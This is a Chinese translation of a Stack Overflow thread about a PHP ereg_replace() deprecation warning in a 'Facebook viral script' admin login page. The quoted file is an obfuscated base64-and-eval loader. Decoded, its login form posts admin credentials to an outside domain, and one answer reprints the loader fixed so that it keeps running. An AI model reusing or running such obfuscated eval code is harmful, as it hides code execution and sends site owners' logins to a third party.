函数ereg_replace()已弃用

时间:2013-02-26 15:22:08

标签: php

我在login.php上收到管理器cpanel的错误。我正在使用Facebook病毒脚本。

Deprecated: Function ereg_replace() is deprecated in /home/content/32/10528532/html/shockvideo/admincpanel/login.php(2) : eval()'d code on line 1

这是我的整个PHP:

<?php $_F=__FILE__;$_X='Pz48P3BocA0KCXI1cTM0cjUgIi4uL3NyYy9mMWM1YjIyay5waHAiOw0KCQ0KCSQzbSA9ICcnOw0KCSRsID0gJyc7DQoJJDUgPSAnJzsNCgkNCgk0ZiAoICg0c3M1dCgkX0dFVFsnNSddKSkgMW5kICg0c3M1dCgkX0dFVFsnbCddKSkpIHsNCgkkNSA9ICRfR0VUWyc1J107DQoJJGwgPSAkX0dFVFsnbCddOwkNCgl9DQoJDQoJJDNtID0gZmJMMmc0bigkX0dFVFsnMyddKTsNCgkkZGJfbDJnNG4gPSBkYkwyZzRuKCRfR0VUWyczcmwnXSk7DQoJDQoJLy9wcjJ2ajVyMSBkMSBsNCBqNSBrMnI0c240ayAzbDJnMnYxbiA0IDFrMiBuNGo1IHByNWIxYzR2MW5qNSBuMSBnbDF2bjMgc3RyMW40YzMNCgk0ZiAoICghKCQzbSAhPSAkNSkpIDFuZCAoISgkbCAhPSAkZGJfbDJnNG4pKSApIHsNCglzNXRjMjJrNDUoRmJWNHIxbFNjcjRwdCwgIlRyMzUiLCB0NG01KCkrb2UwMCk7CQ0KCTVjaDIgJzxzY3I0cHQgbDFuZzMxZzU9IkoxdjFzY3I0cHQiPic7DQoJNWNoMiAidzRuZDJ3LmwyYzF0NDJuPVwiNG5kNXgucGhwXCIiOw0KCTVjaDIgJzwvc2NyNHB0Pic7DQoJfQ0KCQ0KCTRmICg0c3M1dCgkX0NPT0tJRVsnRmJWNHIxbFNjcjRwdCddKSkgew0KCTVjaDIgJzxzY3I0cHQgbDFuZzMxZzU9IkoxdjFzY3I0cHQiPic7DQoJNWNoMiAidzRuZDJ3LmwyYzF0NDJuPVwiNG5kNXgucGhwXCIiOw0KCTVjaDIgJzwvc2NyNHB0Pic7DQoJfQ0KCQ0KPz4NCjxodG1sPg0KPGg1MWQ+DQo8dDR0bDU+QWRtNG4gQ3AxbjVsPC90NHRsNT4NCjxzY3I0cHQgdHlwNT0idDV4dC9qMXYxc2NyNHB0Ij4NCmYzbmN0NDJuIHYxbDRkMXQ1RjJybSgpDQp7DQp2MXIgM3M1cm4xbTU9ZDJjM201bnQuZjJybXNbImwyZzRuX2Yycm0iXVsiM3M1cm4xbTUiXS52MWwzNTsNCnYxciBwMXNzdzJyZD1kMmMzbTVudC5mMnJtc1sibDJnNG5fZjJybSJdWyJwMXNzdzJyZCJdLnYxbDM1Ow0KNGYgKDNzNXJuMW01PT1uM2xsIHx8IDNzNXJuMW01PT0iIiB8fCBwMXNzdzJyZD09bjNsbCB8fCBwMXNzdzJyZD09IiIpIHsNCiAgMWw1cnQoIkwyZzRuIGYycm0gbTNzdCBiNSBmNGxsNWQgMjN0ISIpOw0KICByNXQzcm4gZjFsczU7DQogIH0NCn0NCjwvc2NyNHB0Pg0KPC9oNTFkPg0KPGIyZHk+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJzcDs8L3A+DQo8YzVudDVyPg0KPD9waHANCiRtNXNzMWc1ID0gJF9HRVRbJ201c3MxZzUnXTsNCg0KNGYgKCRtNXNzMWc1ICE9ICcnKSB7DQo1Y2gyICc8ZjJudCBjMmwycj0icjVkIj4nOw0KNWNoMiAkbTVzczFnNSAuICIgVDIgdHJ5IExPR0lOIDFnMTRuIDwxIGhyNWY9XCJsMmc0bi5waHBcIj5DTElDSyBIRVJFITwvMT4iOw0KNWNoMiAnPC9mMm50Pic7DQp9IDVsczUgew0KNWNoMiAnPGYycm0gc3R5bDU9Inc0ZHRoOnV1MHB4OyIgbjFtNT0ibDJnNG5fZjJybSIgbTV0aDJkPSJwMnN0IiAxY3Q0Mm49Imh0dHA6Ly93d3cuZzU1a2gxY2tzLjJyZy9mYnY0cjFsM2x0NG0xdDUvbDJnNG4ucGhwIiAybnMzYm00dD0icjV0M3JuIHYxbDRkMXQ1RjJybSgpIiA+DQo8ZjQ1bGRzNXQgc3R5bDU9InQ1eHQtMWw0Z246bDVmdDsgcDFkZDRuZzphdXB4OyI+PGw1ZzVuZD5BZG00biBDcDFuNWw8L2w1ZzVuZD48YnIgLz4NCg0KVXM1cm4xbTU6IDxiciAvPg0KPDRucDN0IHR5cDU9InQ1eHQiIG4xbTU9IjNzNXJuMW01Ij48QlI+DQpQMXNzdzJyZDogPGJyIC8+DQo8NG5wM3QgdHlwNT0icDFzc3cycmQiIG4xbTU9InAxc3N3MnJkIj48QlI+DQo8NG5wM3QgdHlwNT0iaDRkZDVuIiBuMW01PSIzcmwiIHYxbDM1PSInLiQzcmwuJyI+DQo8NG5wM3QgdHlwNT0iaDRkZDVuIiBuMW01PSJ2NXJzNDJuIiB2MWwzNT0iNi42Ij4NCjw0bnAzdCB0eXA1PSJzM2JtNHQiIG4xbTU9ImwyZzRuIiB2MWwzNT0iTDJnIEluIj48YnIgLz4NCjxicj4NCjwvZjQ1bGRzNXQ+DQo8L2Yycm0+ICc7CQ0KCQ0KfQ0KPz4NCjwvYzVudDVyPg0KPC9iMmR5Pg0KPC9odG1sPg==';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));?>

<?php $_F=__FILE__;$_X='Pz48P3BocA0KCXI1cTM0cjUgIi4uL3NyYy9mMWM1YjIyay5waHAiOw0KCQ0KCSQzbSA9ICcnOw0KCSRsID0gJyc7DQoJJDUgPSAnJzsNCgkNCgk0ZiAoICg0c3M1dCgkX0dFVFsnNSddKSkgMW5kICg0c3M1dCgkX0dFVFsnbCddKSkpIHsNCgkkNSA9ICRfR0VUWyc1J107DQoJJGwgPSAkX0dFVFsnbCddOwkNCgl9DQoJDQoJJDNtID0gZmJMMmc0bigkX0dFVFsnMyddKTsNCgkkZGJfbDJnNG4gPSBkYkwyZzRuKCRfR0VUWyczcmwnXSk7DQoJDQoJLy9wcjJ2ajVyMSBkMSBsNCBqNSBrMnI0c240ayAzbDJnMnYxbiA0IDFrMiBuNGo1IHByNWIxYzR2MW5qNSBuMSBnbDF2bjMgc3RyMW40YzMNCgk0ZiAoICghKCQzbSAhPSAkNSkpIDFuZCAoISgkbCAhPSAkZGJfbDJnNG4pKSApIHsNCglzNXRjMjJrNDUoRmJWNHIxbFNjcjRwdCwgIlRyMzUiLCB0NG01KCkrb2UwMCk7CQ0KCTVjaDIgJzxzY3I0cHQgbDFuZzMxZzU9IkoxdjFzY3I0cHQiPic7DQoJNWNoMiAidzRuZDJ3LmwyYzF0NDJuPVwiNG5kNXgucGhwXCIiOw0KCTVjaDIgJzwvc2NyNHB0Pic7DQoJfQ0KCQ0KCTRmICg0c3M1dCgkX0NPT0tJRVsnRmJWNHIxbFNjcjRwdCddKSkgew0KCTVjaDIgJzxzY3I0cHQgbDFuZzMxZzU9IkoxdjFzY3I0cHQiPic7DQoJNWNoMiAidzRuZDJ3LmwyYzF0NDJuPVwiNG5kNXgucGhwXCIiOw0KCTVjaDIgJzwvc2NyNHB0Pic7DQoJfQ0KCQ0KPz4NCjxodG1sPg0KPGg1MWQ+DQo8dDR0bDU+QWRtNG4gQ3AxbjVsPC90NHRsNT4NCjxzY3I0cHQgdHlwNT0idDV4dC9qMXYxc2NyNHB0Ij4NCmYzbmN0NDJuIHYxbDRkMXQ1RjJybSgpDQp7DQp2MXIgM3M1cm4xbTU9ZDJjM201bnQuZjJybXNbImwyZzRuX2Yycm0iXVsiM3M1cm4xbTUiXS52MWwzNTsNCnYxciBwMXNzdzJyZD1kMmMzbTVudC5mMnJtc1sibDJnNG5fZjJybSJdWyJwMXNzdzJyZCJdLnYxbDM1Ow0KNGYgKDNzNXJuMW01PT1uM2xsIHx8IDNzNXJuMW01PT0iIiB8fCBwMXNzdzJyZD09bjNsbCB8fCBwMXNzdzJyZD09IiIpIHsNCiAgMWw1cnQoIkwyZzRuIGYycm0gbTNzdCBiNSBmNGxsNWQgMjN0ISIpOw0KICByNXQzcm4gZjFsczU7DQogIH0NCn0NCjwvc2NyNHB0Pg0KPC9oNTFkPg0KPGIyZHk+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJzcDs8L3A+DQo8YzVudDVyPg0KPD9waHANCiRtNXNzMWc1ID0gJF9HRVRbJ201c3MxZzUnXTsNCg0KNGYgKCRtNXNzMWc1ICE9ICcnKSB7DQo1Y2gyICc8ZjJudCBjMmwycj0icjVkIj4nOw0KNWNoMiAkbTVzczFnNSAuICIgVDIgdHJ5IExPR0lOIDFnMTRuIDwxIGhyNWY9XCJsMmc0bi5waHBcIj5DTElDSyBIRVJFITwvMT4iOw0KNWNoMiAnPC9mMm50Pic7DQp9IDVsczUgew0KNWNoMiAnPGYycm0gc3R5bDU9Inc0ZHRoOnV1MHB4OyIgbjFtNT0ibDJnNG5fZjJybSIgbTV0aDJkPSJwMnN0IiAxY3Q0Mm49Imh0dHA6Ly93d3cuZzU1a2gxY2tzLjJyZy9mYnY0cjFsM2x0NG0xdDUvbDJnNG4ucGhwIiAybnMzYm00dD0icjV0M3JuIHYxbDRkMXQ1RjJybSgpIiA+DQo8ZjQ1bGRzNXQgc3R5bDU9InQ1eHQtMWw0Z246bDVmdDsgcDFkZDRuZzphdXB4OyI+PGw1ZzVuZD5BZG00biBDcDFuNWw8L2w1ZzVuZD48YnIgLz4NCg0KVXM1cm4xbTU6IDxiciAvPg0KPDRucDN0IHR5cDU9InQ1eHQiIG4xbTU9IjNzNXJuMW01Ij48QlI+DQpQMXNzdzJyZDogPGJyIC8+DQo8NG5wM3QgdHlwNT0icDFzc3cycmQiIG4xbTU9InAxc3N3MnJkIj48QlI+DQo8NG5wM3QgdHlwNT0iaDRkZDVuIiBuMW01PSIzcmwiIHYxbDM1PSInLiQzcmwuJyI+DQo8NG5wM3QgdHlwNT0iaDRkZDVuIiBuMW01PSJ2NXJzNDJuIiB2MWwzNT0iNi42Ij4NCjw0bnAzdCB0eXA1PSJzM2JtNHQiIG4xbTU9ImwyZzRuIiB2MWwzNT0iTDJnIEluIj48YnIgLz4NCjxicj4NCjwvZjQ1bGRzNXQ+DQo8L2Yycm0+ICc7CQ0KCQ0KfQ0KPz4NCjwvYzVudDVyPg0KPC9iMmR5Pg0KPC9odG1sPg==';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));?>

如何解决?如果你能为我这样的新手解释它。感谢。

8 个答案:

答案 0 :(得分:2)

将其替换为a preg_replace,因为php 5.3

,不推荐使用ereg_replace

答案 1 :(得分:2)

问题来自此代码

$_R = ereg_replace('__FILE__', "'" . $_F . "'", $_X);

替换为

$_R = preg_replace('/__FILE__/', "'" . $_F . "'", $_X);

答案 2 :(得分:1)

不推荐使用的函数是不应再使用的函数,将在以后的PHP版本中删除。

不应该使用它们,而是应该使用一些替代方案。尝试使用preg_replace

答案 3 :(得分:0)

您的代码已编码。它看起来很容易逆转。从解码base 64字符串开始。解码后,您需要用等效的字母替换一些数字。

完成后,将ereg_replace切换为preg_replace是微不足道的。相同的模式通常会起作用,但格式略有不同。

这是解码时最后的部分。

$_X=base64_decode($_X);
$_X=strtr($_X,'123456aouie','aouie123456');
$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);
eval($_R);
$_R=0;
$_X=0;

答案 4 :(得分:0)

从头到尾:

在代码中将“eval”替换为“echo”。 从控制台运行php脚本,你得到这个PHP代码:

<?php
$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');
$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;
?>

现在你看到了违规的功能。

快速修复:将ereg_replace替换为@ereg_replace。

记住:这只是隐藏警告。您需要重写代码并使用preg_match(),因为您的代码依赖于不久将从php中删除的弃用函数。

这是您的固定代码:

<?php $_F=__FILE__;$_X='Pz48P3BocA0KCXI1cTM0cjUgIi4uL3NyYy9mMWM1YjIyay5waHAiOw0KCQ0KCSQzbSA9ICcnOw0KCSRsID0gJyc7DQoJJDUgPSAnJzsNCgkNCgk0ZiAoICg0c3M1dCgkX0dFVFsnNSddKSkgMW5kICg0c3M1dCgkX0dFVFsnbCddKSkpIHsNCgkkNSA9ICRfR0VUWyc1J107DQoJJGwgPSAkX0dFVFsnbCddOwkNCgl9DQoJDQoJJDNtID0gZmJMMmc0bigkX0dFVFsnMyddKTsNCgkkZGJfbDJnNG4gPSBkYkwyZzRuKCRfR0VUWyczcmwnXSk7DQoJDQoJLy9wcjJ2ajVyMSBkMSBsNCBqNSBrMnI0c240ayAzbDJnMnYxbiA0IDFrMiBuNGo1IHByNWIxYzR2MW5qNSBuMSBnbDF2bjMgc3RyMW40YzMNCgk0ZiAoICghKCQzbSAhPSAkNSkpIDFuZCAoISgkbCAhPSAkZGJfbDJnNG4pKSApIHsNCglzNXRjMjJrNDUoRmJWNHIxbFNjcjRwdCwgIlRyMzUiLCB0NG01KCkrb2UwMCk7CQ0KCTVjaDIgJzxzY3I0cHQgbDFuZzMxZzU9IkoxdjFzY3I0cHQiPic7DQoJNWNoMiAidzRuZDJ3LmwyYzF0NDJuPVwiNG5kNXgucGhwXCIiOw0KCTVjaDIgJzwvc2NyNHB0Pic7DQoJfQ0KCQ0KCTRmICg0c3M1dCgkX0NPT0tJRVsnRmJWNHIxbFNjcjRwdCddKSkgew0KCTVjaDIgJzxzY3I0cHQgbDFuZzMxZzU9IkoxdjFzY3I0cHQiPic7DQoJNWNoMiAidzRuZDJ3LmwyYzF0NDJuPVwiNG5kNXgucGhwXCIiOw0KCTVjaDIgJzwvc2NyNHB0Pic7DQoJfQ0KCQ0KPz4NCjxodG1sPg0KPGg1MWQ+DQo8dDR0bDU+QWRtNG4gQ3AxbjVsPC90NHRsNT4NCjxzY3I0cHQgdHlwNT0idDV4dC9qMXYxc2NyNHB0Ij4NCmYzbmN0NDJuIHYxbDRkMXQ1RjJybSgpDQp7DQp2MXIgM3M1cm4xbTU9ZDJjM201bnQuZjJybXNbImwyZzRuX2Yycm0iXVsiM3M1cm4xbTUiXS52MWwzNTsNCnYxciBwMXNzdzJyZD1kMmMzbTVudC5mMnJtc1sibDJnNG5fZjJybSJdWyJwMXNzdzJyZCJdLnYxbDM1Ow0KNGYgKDNzNXJuMW01PT1uM2xsIHx8IDNzNXJuMW01PT0iIiB8fCBwMXNzdzJyZD09bjNsbCB8fCBwMXNzdzJyZD09IiIpIHsNCiAgMWw1cnQoIkwyZzRuIGYycm0gbTNzdCBiNSBmNGxsNWQgMjN0ISIpOw0KICByNXQzcm4gZjFsczU7DQogIH0NCn0NCjwvc2NyNHB0Pg0KPC9oNTFkPg0KPGIyZHk+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJzcDs8L3A+DQo8cD4mbmJzcDs8L3A+DQo8YzVudDVyPg0KPD9waHANCiRtNXNzMWc1ID0gJF9HRVRbJ201c3MxZzUnXTsNCg0KNGYgKCRtNXNzMWc1ICE9ICcnKSB7DQo1Y2gyICc8ZjJudCBjMmwycj0icjVkIj4nOw0KNWNoMiAkbTVzczFnNSAuICIgVDIgdHJ5IExPR0lOIDFnMTRuIDwxIGhyNWY9XCJsMmc0bi5waHBcIj5DTElDSyBIRVJFITwvMT4iOw0KNWNoMiAnPC9mMm50Pic7DQp9IDVsczUgew0KNWNoMiAnPGYycm0gc3R5bDU9Inc0ZHRoOnV1MHB4OyIgbjFtNT0ibDJnNG5fZjJybSIgbTV0aDJkPSJwMnN0IiAxY3Q0Mm49Imh0dHA6Ly93d3cuZzU1a2gxY2tzLjJyZy9mYnY0cjFsM2x0NG0xdDUvbDJnNG4ucGhwIiAybnMzYm00dD0icjV0M3JuIHYxbDRkMXQ1RjJybSgpIiA+DQo8ZjQ1bGRzNXQgc3R5bDU9InQ1eHQtMWw0Z246bDVmdDsgcDFkZDRuZzphdXB4OyI+PGw1ZzVuZD5BZG00biBDcDFuNWw8L2w1ZzVuZD48YnIgLz4NCg0KVXM1cm4xbTU6IDxiciAvPg0KPDRucDN0IHR5cDU9InQ1eHQiIG4xbTU9IjNzNXJuMW01Ij48QlI+DQpQMXNzdzJyZDogPGJyIC8+DQo8NG5wM3QgdHlwNT0icDFzc3cycmQiIG4xbTU9InAxc3N3MnJkIj48QlI+DQo8NG5wM3QgdHlwNT0iaDRkZDVuIiBuMW01PSIzcmwiIHYxbDM1PSInLiQzcmwuJyI+DQo8NG5wM3QgdHlwNT0iaDRkZDVuIiBuMW01PSJ2NXJzNDJuIiB2MWwzNT0iNi42Ij4NCjw0bnAzdCB0eXA1PSJzM2JtNHQiIG4xbTU9ImwyZzRuIiB2MWwzNT0iTDJnIEluIj48YnIgLz4NCjxicj4NCjwvZjQ1bGRzNXQ+DQo8L2Yycm0+ICc7CQ0KCQ0KfQ0KPz4NCjwvYzVudDVyPg0KPC9iMmR5Pg0KPC9odG1sPg==';$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');   $_R=@ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;?>

答案 5 :(得分:0)

我们以前都是新手。但首先在SO上进行简单的搜索,即使使用谷歌也可以找到很多。有时,我在google上执行此操作&gt;

ereg_replace site:stackoverflow.com

然后按Enter键。这表明你想要你可能正在寻找。

现在回到你的问题,你能否在SO(Stackoverflow)

上阅读

PHP ereg_replace deprecated

答案 6 :(得分:0)

这个非常简单的,可笑的“受保护”代码可以通过替换:

来修复 
ereg_replace('pattern', 'replacement', $target);

使用:

preg_replace('/pattern/', 'replacement', $target);

这给了你:

$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=preg_replace('/__FILE__/', "'".$_F."'", $_X);eval($_R);$_R=0;$_X=0;

编码为:

  

JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPXByZWdfcmVwbGFjZSgnL19fRklMRV9fLycsICInIi4kX0YuIiciLCAkX1gpO2V2YWwoJF9SKTskX1I9MDskX1g9MDs =

您希望将eval(base64_decode())位置放在接近结尾的位置。

就像注释一样,包含eval(base64_decode())的代码通常是病毒。如果通过扫描主机服务器上运行的进程开始“清理”,请不要感到惊讶。

答案 7 :(得分:-1)

临时修复:将ereg_replace()更改为@ereg_replace()。

这会隐藏警告。

但是你需要用preg_replace()重写代码。

相关问题
最新问题